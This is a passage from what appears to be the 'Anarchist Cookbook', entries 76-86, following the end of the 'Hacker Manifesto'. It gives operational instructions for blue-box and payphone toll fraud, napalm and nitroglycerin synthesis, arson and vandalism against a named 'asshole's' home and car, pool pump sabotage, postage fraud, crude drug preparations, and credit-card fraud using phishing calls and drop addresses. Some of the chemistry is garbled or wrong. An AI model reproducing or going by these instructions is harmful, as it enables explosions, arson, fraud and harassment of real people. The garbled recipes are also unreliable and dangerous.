underachiever. They're all alike. I'm in junior high
or high school. I've listened to teachers explain for the fifteenth time how to
reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did
it in my head..." Damn kid. Probably
copied it. They're all alike. I made a discovery today. I found a computer. Wait
a second, this is cool. It does what I want it to. If it makes a mistake, it's
because I screwed it up. Not because it
doesn't like me or feels threatened by me or thinks I'm a smart ass or doesn't
like teaching and shouldn't be here...damn kid. All he does is play games.
They're all alike. And then it happened. A door
opened to a world. Rushing through the phone line like heroin through an
addict's veins, an electronic pulse is sent out, a refuge from the day-to-day
incompetencies is sought... a board is found. "This is
it... this is where I belong..." I know everyone here... even if I've never met
them, never talked to them, may never hear from them again... I know you all...
Damn kid. Tying up the phone line again.
They're all alike... You bet your ass we're all alike... we've been spoon-fed
baby food at school when we hungered for steak... the bits of meat that you did
let slip through were pre-chewed and
tasteless. We've been dominated by sadists, or ignored by the apathetic. The few
that had something to teach found us willing pupils, but those few are like
drops of water in the desert.
This is our world now... the world of the electron and the switch, the beauty of
the baud. We make use of a service already existing without paying for what
could be dirt-cheap if it wasn't
run by profiteering gluttons, and you call us criminals. We explore... and you
call us criminals. We seek after knowledge... and you call us criminals. We
exist without skin color, without nationality,
without religious bias... and you call us criminals. You build atomic bombs, you
wage wars, you murder, cheat, and lie to us and try to make us believe it's for
our own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging
people by what they say and think, not what they look like. My crime is that of
outsmarting you, something
that you will never forgive me for. I am a hacker, and this is my manifesto. You
may stop this individual, but you can't stop us all... after all, we're all
alike.
+++The Mentor+++
May the members of the phreak community never forget his words -JR
76. The Myth of the 2600hz Detector by The Jolly Roger
Just about everyone I talk to these days about ESS seems to be scared witless
about the 2600hz detector. I don't know who thought this one up, but it simply
does not exist. So many of you people
whine about this so-called phreak catching device for no reason. Someone with
AT&T said they had it to catch phreakers. This was just to scare the blue-boxers
enough to make them quit boxing free
calls. I'm not saying ESS is without its hang-ups, either. One thing that ESS
can detect readily is the kick-back that the trunk circuitry sends back to the
ESS machine when your little 2600hz tone resets
the toll trunk. After an ESS detects a kickback it turns an M-F detector on and
records any M-F tones transmitted.
Defeating the kick-back detector
As mentioned in my previous note, kick-back detection can be a serious nuisance
to anyone interested in gaining control of a trunk line. The easiest way to
by-pass this detection circuitry is not really
by-passing it at all, it is just letting the kick-back get detected on some
other line. This other line is your local MCI, sprint, or other long distance
carrier (except AT&T). The only catch is that the
service you use must not disconnect the line when you hit the 2600hz tone. This
is how you do it: call up your local extender, put in the code, and dial a
number in the 601 area code and the 644
exchange. Lots of other exchanges work across the country, I'm sure, but this is
the only one that I have found so far. Anyway, when it starts ringing, simply
hit 2600Hz and you'll hear the kick-back,
(ka-chirp, or whatever). Then you are ready to dial whoever you want
(conferences, inward, route and rate, overseas, etc.) From the trunk line in
operator tones! Since blowing 2600Hz doesn't make
you a phreaker until the toll equipment resets the line, kickback detection is
the method AT&T chooses (for now) this information comes as a result of my
experiments & experience and has been
verified by local AT&T employees I have as acquaintances. They could only say
that this is true for my area, but were pretty sure that the same idea is
implemented across the country.
Now that you know how to access a trunk line or as operators say a loop, I will
tell you the many things you can do with it. Here is a list of AT&T services
accessible to you by using a blue box.
A/C+101 TOLL SWITCHING
A/C+121 INWARD OPERATOR
A/C+131 INFORMATION
A/C+141 ROUTE & RATE OP.
A/C+11501 MOBILE OPERATOR
A/C+11521 MOBILE OPERATOR
Starting conferences:
This is one the most useful attributes of blue boxing. Now the confs. are up 24
hours/day and 7 days/week and the billing lines are being billed. Since I
believe the above is true (about the billing lines
being billed) I would recommend that you never let your number show up on the
conf. If you started it, put it on a loop and then call the loop. Enough
bullshit!!!!! To start the conf. Dial one of these
three numbers in m-f while you are on the trunk.
213+080+XXXX
XXXX=1050,3050
SPECIAL XXXX=1000,1100,1200,1500,2200,2500.
These numbers are in LA and are the most watched, I do not advise using this
NPA.
312+001+1050 OR 3050
914+042+1050 OR 1100,1200 ECT..
I believe only 914 works at the moment.
Once connected with one of these you will either hear a re-order, busy, or
chirp. When you hear the chirp enter the billing line in M-F. I use the conf.
dial- up. A billing line example:
kp312+001+1050st you will then hear two tutes and a recording asking you for the
number of conferees including yourself. Enter a number between 20 and 30. If you
ever get over 30 people on a
conference all you will hear is jumbled voices. After the it says "your
conference size is xx" then hit the pound (#) sign. Add your favorite loop on
and hit 6 to transfer control to it. After it says control
will be transferred hang up and call the other side of the loop, hit the pound
sign (#) and follow the instructions. A bonus for conf. is to add an
international number dial 1+011+cc+number pretty cool
ehhh. A few extra notes. Do not add numbers that you will want to hang up, add
these through MCI or Sprint. You cannot blow anyone off with 2600hz unless they
are in an old x-bar or older system.
Many DA operators will stay on after you abuse them; you may have to start
another or at least don't say any numbers. Never add the tone side of a loop
onto a conf. never add more than one MCI
node on your conf.
Route & rate:
Note route & rate and RQS perform the same service. R&R simply tells you route
and rate info which is very valuable, ex. Such as the inward routing for an
exchange in an area code. An inward
routing will let you call her and she can do an emergency interrupt for you. She
can tell you how to get international operators, ect. Here are the terms you are
required to use:
International,
-Operator route for [country, city]. -gives you inward op.
-Directory route for [country, city]. -gives you directory ass.
-City route for [country, city]. -gives you country and city code.
Operator route for [a/c]+ [exchange] -gives you inward op. Route
Ex. [a/c]+ or [a/c]+0xx+ when she says plus she means plus 121.
Numbers route for [state, city] -gives you a/c.
Place name [a/c]+[exchange] -gives you city/state for that a/c and
Exchange.
International calls:
To call international over cable simply access a trunk and dial kp011xxxst wait
for sender tone, kpxxxcc-numberst xxx - a 3 digit country code, it may not be 3
digits so just put 1 or 2 0's in front of it.
Cc - is the city code to go by satellite:
Dial kp18xst x - numbers 2-8 wait for sender tone then Kpxxxccnumberst
77. Blue Box by The Jolly Roger
To quote Karl Marx, blue boxing has always been the most noble form of
phreaking. As opposed to such things as using an MCI code to make a free fone
call, which is merely mindless
pseudo-phreaking, blue boxing is actual interaction with the Bell System toll
network. It is likewise advisable to be more cautious when blue boxing, but the
careful phreak will not be caught, regardless
of what type of switching system he is under. In this part, I will explain how
and why blue boxing works, as well as where. In later parts, I will give more
practical information for blue boxing and routing
information. To begin with, blue boxing is simply communicating with trunks.
Trunks must not be confused with subscriber lines (or "customer loops") which
are standard telefone lines. Trunks are those
lines that connect central offices. Now, when trunks are not in use (i.e., idle
or "on-hook" state) they have 2600Hz applied to them. If they are two-way
trunks, there is 2600Hz in both directions.
When a trunk IS in use (busy or "off-hook" state), the 2600Hz is removed from
the side that is off-hook. The 2600Hz is therefore known as a supervisory
signal, because it indicates the status of a
trunk; on hook (tone) or off-hook (no tone). Note also that 2600Hz denoted SF
(single frequency) signaling and is "in-band." This is very important. "In-band"
means that is within the band of
frequencies that may be transmitted over normal telefone lines. Other SF
signals, such as 3700Hz are used also. However, they cannot be carried over the
telefone network normally (they are
"out-of-band" and are therefore not able to be taken advantage of as 2600Hz is.
Back to trunks. Let's take a hypothetical phone call. You pick up your fone and
dial 1+806-258-1234 (your good
friend in Amarillo, Texas). For ease, we'll assume that you are on #5 Crossbar
switching and not in the 806 area. Your central office (CO) would recognize that
806 is a foreign NPA, so it would route
the call to the toll center that serves you. [For the sake of accuracy here, and
for the more experienced readers, note that the CO in question is a class 5 with
LAMA that uses out-of-band SF
supervisory signaling]. Depending on where you are in the country, the call
would leave your toll center (on more trunks) to another toll center, or office
of higher "rank". Then it would be routed to
central office 806-258 eventually and the call would be completed.
Illustration
A---CO1-------TC1------TC2----CO2----B
A.... you
CO1.. your central office
TC1.. your toll office.
TC2.. toll office in Amarillo.
CO2.. 806-258 central office.
B.... your friend (806-258-1234)
In this situation it would be realistic to say that CO2 uses SF in-band (2600Hz)
signaling, while all the others use out-of-band signaling (3700Hz). If you don't
understand this, don't worry. I am pointing
this out merely for the sake of accuracy. The point is that while you are
connected to 806-258-1234, all those trunks from YOUR central office (CO1) to
the 806-258 central office (CO2) do *NOT*
have 2600Hz on them, indicating to the Bell equipment that a call is in progress
and the trunks are in use. Now let's say you're tired of talking to your friend
in Amarillo, so you send a 2600Hz down the
line. This tone travels down the line to your friend's central office (CO2)
where it is detected. However, that CO thinks that the 2600Hz is originating
from Bell equipment, indicating to it that you've
hung up, and thus the trunks are once again idle (with 2600Hz present on them).
But actually, you have not hung up, you have fooled the equipment at your
friend's CO into thinking you have. Thus, it
disconnects him and resets the equipment to prepare for the next call. All this
happens very quickly (300-800ms for step-by-step equipment and 150-400ms for
other equipment). When you stop
sending 2600Hz (after about a second), the equipment thinks that another call is
coming towards --> on hook, no tone -->off hook. Now that you've stopped sending
2600Hz, several things happen:
1. A trunk is seized.
2. A "wink" is sent to the CALLING end from the CALLED end indicating that the
CALLED end (trunk) is not ready to receive digits yet.
3. A register is found and attached to the CALLED end of the trunk within about
two seconds (max).
4. A start-dial signal is sent to the CALLING end from the CALLED end indicating
that the CALLED end is ready to receive digits. Now, all of this is pretty much
transparent to the blue
boxer. All he really hears when these four things happen is a <beep><kerchunk>.
So, seizure of a trunk would go something like this:
1. Send a 2600Hz
2. Terminate 2600Hz after 1-2 secs.
3. [beep][kerchunk]
Once this happens, you are connected to a tandem that is ready to obey your
every command. The next step is to send signaling information in order to place
your call. For this you must simulate the
signaling used by operators and automatic toll-dialing equipment for use on
trunks. There are mainly two systems, DP and MF. However, DP went out with the
dinosaurs, so I'll only discuss MF
signaling. MF (multi-frequency) signaling is the signaling used by the majority
of the inter- and intra-lata network. It is also used in international dialing
known as the CCITT No½ system. MF signals
consist of 7 frequencies, beginning with 700Hz and separated by 200Hz. A
different set of two of the 7 frequencies represent the digits 0 thru 9, plus an
additional 5 special keys. The frequencies and
uses are as follows:
Frequencies(Hz) Domestic International
700+900 1 1
700+1100 2 2
900+1100 3 3
700+1300 4 4
900+1300 5 5
1100+1300 6 6
700+1500 7 7
900+1500 8 8
1100+1500 9 9
1300+1500 0 0
700+1700 ST3p Code 1
900+1700 Stp Code 1
1100+1700 KP KP1
1300+1700 ST2p KP2
1500+1700 ST ST
The timing of all the MF signals is a nominal 60ms, except for KP, which should
have a duration of 100ms. There should also be a 60ms silent period between
digits. This is very flexible however, and
most Bell equipment will accept outrageous timings. In addition to the standard
uses listed above, MF pulsing also has expanded usages known as "expanded inband
signaling" that include such things as
coin collect, coin return, ringback, operator attached, and operator attached,
and operator released. KP2, code 11, and code 12 and the ST_ps (STart "primes"
all have special uses which will be
mentioned only briefly here. To complete a call using a blue box once seizure of
a trunk has been accomplished by sending 2600Hz and pausing for the
<beep><kerchunk>, one must first send a KP.
This readies the register for the digits that follow. For a standard domestic
call, the KP would be followed by either 7 digits (if the call were in the same
NPA as the seized trunk) or 10 digits (if the call
were not in the same NPA as the seized trunk). [Exactly like dialing normal fone
call]. Following either the KP and 7 or 10 digits, a STart is sent to signify
that no more digits follow. Example of a
complete call:
1. Dial 1-806-258-1234
2. Wait for a call-progress indication (such as ring,busy,recording,etc.)
3. Send 2600Hz for about 1 second.
4. Wait for about ll-progress indication (such as ring,busy,recording,etc.)
5. Send KP+305+994+9966+ST
The call will then connect if everything was done properly. Note that if a call
to an 806 number were being placed in the same situation, the are code would be
omitted and only KP + seven digits + ST
would be sent. Code 11 and code 12 are used in international calling to request
certain types of operators. KP2 is used in international calling to route a call
other than by way of the normal route,
whether for economic or equipment reasons. STp, ST2p, and ST3p (prime, two
prime, and three prime) are used in TSPS signaling to indicate calling type of
call (such as coin-direct dialing.
78. Napalm II by The Jolly Roger
[See file #021 of the Cookbook for an easy way to make it!!]
About the best fire bomb is napalm. It has a thick consistency, like jam and is
best for use on vehicles or buildings. Napalms is simply one part gasoline and
one part soap. The soap is either soap flakes
or shredded bar soap. Detergents won't do. The gasoline must be heated in order
for the soap to melt. The usual way is with a double boiler where the top part
has at least a two-quart capacity. The
water in the bottom part is brought to a boil and the double boiler is taken
from the stove and carried to where there is no flame. Then one part, by volume,
of gasoline is put in the top part and allowed
to heat as much as it will and the soap is added and the mess is stirred until
it thickens. A better way to heat gasoline is to fill a bathtub with water as
hot as you can get it. It will hold its heat longer and
permit a much larger container than will the double boiler.
79. Nitroglycerin Recipe by The Jolly Roger
Like all chemists I must advise you all to take the greatest care and caution
when you are doing this. Even if you have made this stuff before. This first
article will give you information on making
nitroglycerin, the basic ingredient in a lot of explosives such as straight
dynamites, and gelatin dynamites.
Making nitroglycerin:
1. Fill a 75-milliliter beaker to the 13 mL. Level with fuming red nitric acid,
of 98% pure concentration.
2. Place the beaker in an ice bath and allow to cool below room temp.
3. After it has cooled, add to it three times the amount of fuming sulferic acid
(99% h2so4). In other words, add to the now-cool fuming nitric acid 39 mL. Of
fuming sulferic acid. When
mixing any acids, always do it slowly and carefully to avoid splattering.
4. When the two are mixed, lower their temp. By adding more ice to the bath,
about 10-15°C. (Use a mercury-operated thermometer)
5. When the acid solution has cooled to the desired temperature, it is ready for
the glycerin. The glycerin must be added in small amounts using a medicine
dropper. (Read this step about 10
times!) Glycerin is added slowly and carefully (I mean careful!) Until the
entire surface of the acid it covered with it.
6. This is a dangerous point since the nitration will take place as soon as the
glycerin is added. The nitration will produce heat, so the solution must be kept
below 30°C! If the solution should
go above 30°C, immediately dump the solution into the ice bath! This will insure
that it does not go off in your face!
7. For the first ten minutes of nitration, the mixture should be gently stirred.
In a normal reaction the nitroglycerin will form as a layer on top of the acid
solution, while the sulferic acid will
absorb the excess water.
8. After the nitration has taken place, and the nitroglycerin has formed on the
top of the solution, the entire beaker should be transferred slowly and
carefully to another beaker of water. When
this is done the nitroglycerin will settle at the bottom so the other acids can
be drained away.
9. After removing as much acid as possible without disturbing the nitroglycerin,
remove the nitroglycerin with an eyedropper and place it in a bicarbonate of
soda (sodium bicarbonate in case
you didn't know) solution. The sodium is an alkali and will neutralize much of
the acid remaining. This process should be repeated as much as necessary using
blue litmus paper to check for the
presence of acid. The remaining acid only makes the nitroglycerin more unstable
than it already is.
10. Finally! The final step is to remove the nitroglycerin from the bicarbonate.
His is done with and eye- dropper, slowly and carefully. The usual test to see
if nitration has been successful is to
place one drop of the nitroglycerin on metal and ignite it. If it is true
nitroglycerin it will burn with a clear blue flame.
** Caution **
Nitro is very sensitive to decomposition, heating dropping, or jarring, and may
explode if left undisturbed and cool.
80. Operation: Fuckup by The Jolly Roger
This is a guide for Anarchists and can be funny for non-believers and 12 and 13
year old runts, and can be a lexicon of deadly knowledge for True Anarchists...
Serious damage is intended to be dealt
here. Do not try this stuff unless you want to do a lot of serious Anarchy.
[Simulation]
Asshole - 'Listen, you little teenager punk shit, shut the fuck up, or I'll
knock you down!'
Anarchist - 'O.K. You can't say I didn't warn you. You don't know my rue
power...' (soooo casually)
Asshole - 'Well, er, what do you mean?
Anarchist - '<demoniac grin>' As you can see, the Anarchist knows something that
this asshole doesn't...
[Operation Fuckup]
Get a wheel barrel or two. Fill with gasoline. Get 16 rolls of toilet paper,
unroll & drench in the gasoline. Rip to shreds in gasoline. Get asbestos gloves.
Light a flare (to be punk), grab glob of saturated
toilet paper (you can ignite the glob or not). Throw either flaming or dripping
glob into:
· Any window (picture is the best)
· Front doors
· Rough grain siding
· Best of all, brick walls
First of all, this bitch is near impossible to get off once dried, and is a
terror to people inside when lit! After this... during the night, get a pickup
truck, a few wheel-barrels, and a dozen friends with
shovels. The pickup can be used only for transporting people and equipment, or
doing that, and carting all the dirt. When it gets around 12:00 (after the loser
goes beddie - bye), dig a gargantuan hole
in his front yard until about 3:00. You can either assign three or four of your
friends to cart the dirt ten miles away in the pickup-bed, or bury his front
door in 15' of dirt! After that is done, get three or
four buckets of tar, and coat his windows. You can make an added twist by
igniting the tar when you are all done and ready to run! That is if the loser
has a house. If he lives inside an apartment
building, you must direct the attack more toward his car, and front door. I
usually start out when he goes to work...I find out what his cheap car looks
like, and memorize it for future abuse...It is always
fun to paint his front door (apt.) hot pink with purple polka-dots, and off-neon
colors in diagonal stripes. You can also pound a few hundred or so four
inch nails into his front door (this looks like somebody really doesn't like you
from the inside). Another great is to fill his keyhole with liquid steel so that
after the bastard closes his door - the only way
to get back in is to break it down. If you can spare it, leave him an axe - that
is, implanted three inches into, and through the door! Now, this next one is
difficult, but one of the best! Get a piece of
wood siding that will more than cover his front door completely. Nail two by
fours on the edges of the siding (all except the bottom) so you have a barge -
like contraption. Make a hole at the top that
will be large enough for a cement slide. Mix about six or seven LARGE bags of
QUICK drying cement. Use the cement slide to fill the antechamber created by the
'barge' that is around his door. Use
more two by fours to brace your little cement-filled barge, and let the little
gem dry. When it is, remove the 'barge' so only a stone monolith remains that
covers his door. Use any remaining cement to
make a base around this so he can't just push it over. When I did this, he
called the fire department, and they thought he meant wood, so they brought
axes. I watched with a few dozen or so other
tenants, and laughed my damn ass off! This is only his door! After he parks his
car for the night, the fun really begins...I start out by opening up the car by
jamming a very thin, but loack - inside and out!
Then proceed to put orange-juice syrup all over the seats, so after he gets
through all the other shit that you do, he will have the stickiest
seats in the world. You can then get a few Sunday papers, and crack one of the
windows about four inches. Lightly crumple the papers, and continue to
completely fill the inside of his car with the
newspapers. A copy of the Sunday New York Times will nicely fill a Volkswagen!
What is also quite amusing is to put his car on cinder blocks, slash his tires
at the top, and fill them with cement!
Leave the cinder blocks there so that, after he knocks the car off of them, he
will get about 3 miles to the gallon with those tires, and do 0 to 60 in about
two minutes! It is even more hilarious when he
doesn't know why the hell why! Another is to open his hood, and then run a few
wires from the sparkplugs to the METAL body. The sure is one HOT car when it is
running! Now, I like to pour two
pounds of sugar down his gas tank. If this doesn't blow every gasket in his
engine it will do something called 'caramelizing his engine'. This is when the
extreme heat turns the sugar to caramel, and you
literally must completely take the engine out and apart, and clean each and
every individual part! Well, if this asshole does not get the message, you had
better start to get serious. If this guide was used
properly & as it was intended (no, not as kindling for the fire), this asshole
will either move far away, seek professional psychological help, commit suicide,
or all of the above!
81. Stealing calls from payphones by The Jolly Roger
Now to make free local calls, you need a finishing nail. I highly recommend "6D
E.G. FINISH C/H, 2 INCH" nails. These are about 3/32 of an inch in diameter and
2 inches long (of course). You also
need a large size paper clip. By large I mean they are about 2in long (FOLDED).
Then you unfold the paper clip. Unfold it by taking each piece and moving it out
90°. When it is done it should look
somewhat like this:
/----------\
: :
: :
: :
: :
\-----
Now, on to the neat stuff. What you do, instead of unscrewing the glued-on
mouthpiece, is insert the nail into the center hole of the mouthpiece (where you
talk) and push it in with pressure or just
hammer it in by hitting the nail on something. Just DON'T KILL THE MOUTHPIECE!
You could damage it if you insert the nail too far or at some weird angle. If
this happens then the other
party won't be able to hear what you say. You now have a hole in the mouthpiece
in which you can easily insert the paper clip. So, take out the nail and put in
the paper clip. Then take the other end
of the paper clip and shove it under the rubber cord protector at the bottom of
the handset (you know, the blue guy...). This should end up looking remotely
like...like this:
/----------\ Mouthpiece
: :
Paper clip --> : : /
: /---:---\
: : :
:------------>
====================\---))):
: To earpiece ->
^ ^
\-------------------->
: :
: :
Cord Blue guy
(The paper clip is shoved under the blue guy to make a good connection between
the inside of the mouthpiece and the metal cord.) Now, dial the number of a
local number you wish to call,
sayyyy, MCI. If everything goes okay, it should ring and not answer with the
"The Call You Have Made Requires a 20 Cent Deposit" recording. After the other
end answers the phone, remove the
paper clip. It's all that simple, see? There are a couple problems, however. One
is, as I mentioned earlier, the mouthpiece not working after you punch it. If
this happens to you, simply move on
to the next payphone. The one you are now on is lost. Another problem is that
the touch tones won't work when the paper clip is in the mouthpiece. There are
two ways around this..
1. Dial the first 6 numbers. This should be done without the paper clip making
the connection, i.e., one side should not be connected. Then connect the paper
clip, hold down the last digit,
and slowly pull the paper clip out at the mouthpiece's end.
2. Don't use the paper clip at all. Keep the nail in after you punch it. Dial
the first 6 digits. Before dialing the last digit, touch the nail head to the
plate on the main body of the phone, the
money safe thingy..then press the last number. The reason that this method is
sometimes called clear boxing is because there is another type of phone which
lets you actually make the call and
listen to them say "Hello, hello?" but it cuts off the mouthpiece so they can't
hear you. The Clear Box is used on that to amplify your voice signals and send
it through the earpiece. If you see
how this is even slightly similar to the method I have just described up there,
kindly explain it to ME!! Cause I don't GET IT! Anyways, this DOES work on
almost all single slot, Dial Tone First
payphones (Pacific Bell for sure). I do it all the time. This is the least, I
STRESS *LEAST*, risky form of Phreaking.
82. Pool Fun by The Jolly Roger
First of all, you need know nothing about pools. The only thing you need know is
what a pool filter looks like. If you don't know that. Second, dress casual.
Preferably, in black. Visit your "friends"
house, the one whose pool looks like fun!! Then you reverse the polarity of
his/her pool, by switching the wires around. They are located in the back of the
pump. This will have quite an effect when the
pump goes on. In other words. Boooooooooooommm! That's right, when you mix +
wires with - plugs, and vice- versa, the 4th of July happens again. Not into
total destruction??? When the pump is
off, switch the pump to "backwash". Turn the pump on and get the phuck out! When
you look the next day, phunny. The pool is dry. If you want permanent damage,
yet no great display like my first
one mentioned, shut the valves of the pool off. (There are usually 2) One that
goes to the main drain and one that goes to the filter in the pool. That should
be enough to have one dead pump. The
pump must take in water, so when there isn't any... Practical jokes: these next
ones deal with true friends and
there is *no* permanent damage done. If you have a pool, you must check the pool
with chemicals. There is one labeled orthotolidine. The other is labeled
alkaline (pH). You want orthotolidine. (It
checks the chlorine). Go to your local pool store and tell them you're going
into the pool business, and to sell you orthotolidine (a CL detector) Buy this
in great quantities if possible. The solution is
clear. You fill 2 baggies with this chemical. And sew the bags to the inside of
your suit. Next, go swimming with your friend! Then open the bags and look like
you're enjoying a piss. And anyone
there will turn a deep red! They will be embarrassed so much, Especially if they
have guests there! Explain what it is, then add vinegar to the pool. Only a
little. The "piss" disappears.
83. Free Postage by The Jolly Roger
The increasing cost of postage to mail letters and packages is bringing down our
standard of living. To remedy this deplorable situation, some counter control
measures can be applied. For example, if
the stamps on a letter are coated with Elmer's Glue by the sender, the
cancellation mark will not destroy the stamp: the Elmer's drives to form an
almost invisible coating that protects the stamps from
the cancellation ink. Later, the receiver of the letter can remove the
cancellation mark with water and reuse the stamps. Furthermore, ecological
saving will also result from recycling the stamps. Help
save a tree. The glue is most efficiently applied with a brush with stiff, short
bristles. Just dip the brush directly into the glue and spread it on evenly,
covering the entire surface of the stamp. It will dry in
about 15 minutes. For mailing packages, just follow the same procedure as
outlined above; however, the package should be weighed and checked to make sure
that it has the correct amount of
postage on it before it is taken to the Post Office. Removing the cancellation
and the glue from the stamps can be easily accomplished by soaking the stamps in
warm water until they float free from the
paper. The stamps can then be put onto a paper towel to dry. Processing stamps
in large batches saves time too. Also, it may be helpful to write the word
'Elmer' at the top of the letter (not on the
envelope) to cue the receiving party in that the stamps have been protected with
the glue. We all know that mailing packages can be expensive. And we also know
that the handicapped are sometimes
discriminated against in jobs. The Government, being the generous people they
are, have given the blind free postal service. Simply address you envelope as
usual, and make one modification. In the
corner where the stamp would go, write in (or stamp) the words 'FREE MATTER FOR
THE BLIND". Then drop you package or letter in one of the blue federal
mailboxes. DO NOT TAKE THE
LETTER TO THE POST OFFICE, OR LEAVE IT IN YOUR MAILBOX. Sounds very nice of the
government to do this, right? Well, they aren't that nice. The parcel is sent
library rate, that is
below third class. It may take four to five days to send a letter to just the
next town. This too is quite simple, but less effective. Put the address that
you are sending the letter to as the return address. If
you were sending a $20 donation to the pirate's Chest, you would put our address
(PO box 644, Lincoln MA 01773) as the return address. Then you would have to be
careless and forget to put the
stamp on the envelope. A nice touch is to put a bullshit address in the center
of the envelope. Again, you MUST drop the letter in a FEDERAL mailbox. If the
post office doesn't send the letter to the
return address for having no stamp, they will send it back for the reason of "No
such address".
Example:
Pirates Chest Dept. 40DD
P.O. Box 644865
Lincol, Ma. 41773
Tom Bullshit
20 Fake Road
What Ever, XX 99851
One last thing you might try doing is soaking a canceled stamp off of an
envelope, and gluing it onto one you are sending. Then burn the stamp, leaving a
little bit to show that there was one there.
84. Unstable Explosives by The Jolly Roger
Mix solid Nitric Iodine with household ammonia. Wait overnight and then pour off
the liquid. You will be left with a muddy substance. Let this dry till it
hardens. Now throw it at something!!!!
85. Weird Drugs by The Jolly Roger
Bananas:
1. Obtain 15 pounds of ripe yellow bananas.
2. Peel all and eat the fruit. Save the peelings.
3. Scrape all the insides of the peels with a sharp knife.
4. Put all the scraped material in a large pot and add water.
5. Boil 3 or 4 hours until it has attained a solid paste consistency.
6. Spread paste onto cookie sheets and dry in oven for about 20 minutes. This
will result in fine black powder. Usually one will feel the effects after
smoking three to four cigarettes.
Cough syrup:
Mix Robitussion AC with an equal amount of ginger ale and drink. The effect are
sedation and euphoria. Never underestimate the effects of any drug! You can OD
on cough syrup!
Toads:
1. Collect five to ten toads, frogs will not work. The best kind are tree toads.
2. Kill them as painlessly as possible, and skin immediately.
3. Allow the skins to dry in a refrigerator four to five days, or until the
skins are brittle.
4. Now crush the skins into powder and smoke. Due to its bad taste you can mix
it with a more fragrant smoking medium.
Nutmeg:
1. Take several whole nutmegs and grind them up in an old grinder.
2. After the nutmegs are ground. Place in a mortar and pulverize with a pestle.
3. The usual dosage is about 10 or 15 grams. A larger dose may produce excessive
thirst, anxiety, and rapid heart beat, but hallucinations are rare.
Peanuts:
1. Take 1 pound of raw peanuts (not roasted.)
2. Shell them, saving the skins and discarding the shells.
3. Eat the nuts.
4. Grind up the skins and smoke them.
86. The Art of Carding by The Jolly Roger
Obtaining a credit card number: There are many ways to obtain the information
needed to card something. The most important things needed are the card number
and the expiration date. Having the
card-holders name doesn't hurt, but it is not essential. The absolute best way
to obtain all the information needed is by trashing. The way this is done is
simple. You walk around your area or any other
area and find a store, mall, supermarket, etc., that throws their garbage
outside on the sidewalk or dumpster. Rip the bag open and see if you can find
any carbons at all. If you find little shreds of
credit card carbons, then it is most likely not worth your time to tape
together. Find a store that does not rip their carbons at all or only in half.
Another way is to bullshit the number out of someone.
That is call them up and say "Hello, this is Visa security and we have a report
that your card was stolen." They will deny it and you will try to get it out of
them from that point on. You could say, "It
wasn't stolen? Well what is the expiration date and maybe we can fix the
problem.... OK and what is the number on your card?......Thank you very much and
have a nice day." Or think of something
to that degree. Another way to get card numbers is through systems such as TRW
and CBI, this is the hard way, and probably not worth the trouble, unless you
are an expert on the system. Using
credit card numbers posted on BBS's is risky. The only advantage is that there
is a good chance that other people will use it, thus decreasing the chances of
being the sole-offender. The last method of
getting numbers is very good also. In most video rental stores, they take down
your credit card number when you join to back-up your rentals. So if you could
manage to steal the list or make a copy
of it, then you are set for a LONG time. Choosing a victim: Once you have the
card number, it is time to make the order. The type of places that are easiest
to victimize are small businesses that do
mail order or even local stores that deliver. If you have an ad for a place with
something you want and the order number is NOT a 1-800 number then chances are
better that you will succeed.
Ordering
When you call the place up to make the order, you must have several things
readily at hand. These are the things you will need: A name, telephone number,
business phone, card number (4 digit bank
code if the card is MasterCard), expiration date, and a complete shipping and
billing address. I will talk about all of these in detail. A personal tip: When
I call to make an order, it usually goes much
smoother if the person you are talking to is a woman. In many cases they are
more gullible than men. The name: You could use the name on the card or the name
of the person who you are going to
send the merchandise to. Or you could use the name on the card and have it
shipped to the person who lives at the drop (Say it is a gift or something). The
name is really not that important because
when the company verifies the card, the persons name is never mentioned, EXCEPT
when you have a Preferred Visa card. Then the name is mentioned. You can tell if
you have a Preferred Visa card
by the PV to the right of the expiration date on the carbon. No phone all day
long waiting for the company to call (Which they will), then the phone number to
give them as your home-phone could be
one of the following: A number that is ALWAYS busy, a number that ALWAYS rings,
a payphone number, low end of a loop (and you will wait on the other end), or a
popular BBS. NEVER give
them your home phone because they will find out as soon as the investigation
starts who the phone belongs to. The best thing would be to have a payphone call
forward your house (via Cosm The
business number.) When asked for, repeat the number you used for your home
phone. Card number: The cards you will use will be Visa, Mastercard, and
American Express. The best is by far Visa.
It is the most straight-forward. Mastercard is pretty cool except for the bank
code. When they ask for the bank code, they sometimes also ask for the bank that
issued it. When they ask that just say
the biggest bank you know of in your area. Try to avoid American Express. They
tend to lead full scale investigations. Unfortunately, American Express is the
most popular card out. When telling the
person who is taking your call the card number, say it slow, clear, and with
confidence. e.g. CC# is 5217-1234-5678-9012. Pause after each set of four so you
don't have to repeat it. Expiration date:
The date must be at LEAST in that month. It is best to with more than three
months to go. The address: More commonly referred to as the 'drop'. Well the
drop can range from an abandoned building
to your next door neighbors apartment. If you plan to send it to an apartment
building then be sure NOT to include an apartment number. This will confuse UPS
or postage men a little and they will
leave the package in the lobby. Here is a list of various drops: The house next
door whose family is on vacation, the apartment that was just moved out of, the
old church that will be knocked down in
six months, your friends house who has absolutely nothing to do with the type of
merchandise you will buy and who will also not crack under heat from feds, etc..
There are also services that hold
merchandise for you, but personally I would not trust them. And forget about
P.O. Boxes because you need ID to get one and most places don't ship to them
anyway. Other aspects of carding:
Verifying cards, seeing if they were reported stolen. Verifying cards: Stores
need to verify credit cards when someone purchases something with one. They call
up a service that checks to see if the
customer has the money in the bank. The merchant identifies himself with a
merchant number. The service then holds the money that the merchant verified on
reserve. When the merchant sends in the
credit card form, the service sends the merchant the money. The service holds
the money for three days and if no form appears then it is put back into the
bank. The point is that if you want to verify
something then you should verify it for a little amount and odds are that there
will be more in the bank. The good thing about verification is that if the card
doesn't exist or if it is stolen then the service will
tell you. To verify MasterCard and Visa try this number. It is voice:
1-800-327-1111 merchant code is 596719. Stolen cards: Mastercard and Visa come
out with a small catalog every
week where they publish EVERY stolen or fraudulently used card. I get this every
week by trashing the same place on the same day. If you ever find it trashing
then try to get it every week. Identifying
cards: Visa card numbers begin with a 4 and have either 13 or 16 digits.
MasterCard card numbers begin with a 5 and have 16 digits. American Express
begins with a 3 and has 15 digits. They all
have the formats of the following:
3xxx-xxxxxx-xxxxx American Express
4xxx-xxx-xxx-xxx Visa
4xxx-xxxx-xxxx-xxxx Visa
5xxx-xxxx-xxxx-xxxx MasterCard
Gold cards: A gold card simply means that credit is good for $5000. Without a
gold card, credit would be normally $2000. To recognize a gold card on a carbon
there are several techniques:
American Express-none.
